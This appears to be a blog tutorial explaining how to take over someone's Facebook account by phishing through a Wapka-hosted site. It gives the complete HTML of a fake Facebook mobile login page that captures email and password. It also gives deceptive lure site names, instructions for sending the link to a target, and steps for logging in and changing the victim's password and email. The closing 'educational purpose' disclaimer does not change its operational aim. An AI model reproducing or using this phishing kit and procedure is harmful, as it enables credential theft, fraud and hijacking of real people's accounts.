how to hack a Facebook account

21:52 0 Comments A+ a-

We are using a method called PHISHING
"Phishing Method Facebook Account Hacking using WAPKA"

What is Phishing?
Phishing is a way of deceiving your victim by making him login through one of your webpages which is a copy of the original one. By doing so the fake webpage will save his E-mail ID or username and password. This is used for criminal activities for stealing Credits Cards and So on.
Now we are going to make a "FAKE LOGIN Page of Facebook".

Lets start the tutorial.

Step 1: Register a new Wapka Account from here.

Step 2: "Create New Site" (Remember: Create attractive site name like "free recharge" , "freeinternet" , "freetalktime" etc.) and then goto "Admin mode" ,then ":: EDIT SITE (#) ::" and then "- WML/XHTML code".

Step 3: Write-
1. "WML/XHTML code"="↓ Paste Below Given Code↓"

<!Doctype html><br /><html><br /><head><link rel="stylesheet" type="text/css" href="" /><br /><link rel="shortcut icon" href="" /><br /><script type="text/javascript"> document.title = "Welcome to Facebook"; &ltscript><br /><link rel="shortcut icon" href="" /><br />&lthead><br /><body class="nontouch acw"><br /><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><br /><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href=""><img src="" width="76" height="20" class="img" alt="facebook" />&lta>&lth1>&lttd><td valign="top" class="r"><a class="btn btnS" href="">Create Account&lta>&lttd>&lttr>&lttable>&ltdiv><br /><div class="loginInner"><div class="acy apl abt abb"><a href="">Get Facebook Mobile and browse faster.&lta>&ltdiv><div style="background: #eceff5;"><form method="post" class="mobile-login-form _fcp" onSubmit=" ('')" action="site_0.xhtml"><div class="mobile-login-field aclb apl"><div style="margin-left: 6px;">Email address or phone number<br/><input type="text" name="mf_text[Email]" class="input">&ltdiv>&ltdiv><div class="mobile-login-field aclb apl"><div style="margin-left: 6px;">Password<br/><input type="password" class="input" name="mf_text[Password]">&ltdiv>&ltdiv><div class="button_area aclb apl" style="margin-left: 10px; background: #eceff5;"><input type="hidden" name="p" value="146956576" /><input type="hidden" name="action" value="send_message"><input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" />&ltdiv><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp" style="background: #eceff5;"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?&ltb>&ltspan>&ltdiv><div class="_4u9b aclb"><div class="button_area aclb apl" style="margin-left: 8px;"><a class="btn btnS largeBtn" href="">Create New Account&lta>&ltdiv>&ltdiv><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" />&ltform>&ltdiv><br /><div class="other-links aclb apl"><span class="mfsm fcg"><a href="">Forgot password?&lta><br/><br /><a href="">Help Center&lta>&ltspan>&ltdiv>&ltdiv><br /><div id="footer"><div class="acg apm" style="background: #eceff5;"><span class="mfss fcg"><b>English (US)&ltb> <span role="separator" aria-hidden="true">·&ltspan> <a class="sec" href="">Español&lta> <span role="separator" aria-hidden="true">·&ltspan> <a class="sec" href="">Português (Brasil)&lta> <span role="separator" aria-hidden="true">·&ltspan> <a class="sec" href="">More…&lta>&ltspan>&ltdiv><br /><div class="acg apm" style="background: #eceff5;"><span class="mfss fcg" style="color: black;">Facebook ©2015&ltspan>&ltdiv>&ltdiv><br />&ltbody><br />&lthtml><br /><textarea style="display: none" />

2. "Display this code in"="both WAP versions (WML xHTML)"
3. "Align"="Left"
4. "Display after submit"="Edited site"
5. "Place WML code in front of"="--- at the top"

Step 4: Click on "Submit".

Step 5: Login to your Facebook account and send the link of you newly created site to the person whose Facebook account you want to hack and tell him to click on link.

If that person clicks on the link and logins via that link , then his account is hacked.

Step 6: Then immediately goto the Inbox of email from which you have created your WAPKA account and wait for message subjected "wapka". Open that message and
you will see that person's Email or username and Password.

Step 7: Then open his Facebook account and change that person's "Password" and "Email".

Done. Now you have hacked that person's Facebook account successfully.

This tutorial is only for educational purpose. I will 'not' be held responsible in any case for and harm or/and illegal activities caused by this tutorial to any person.

Originally and Officially by:

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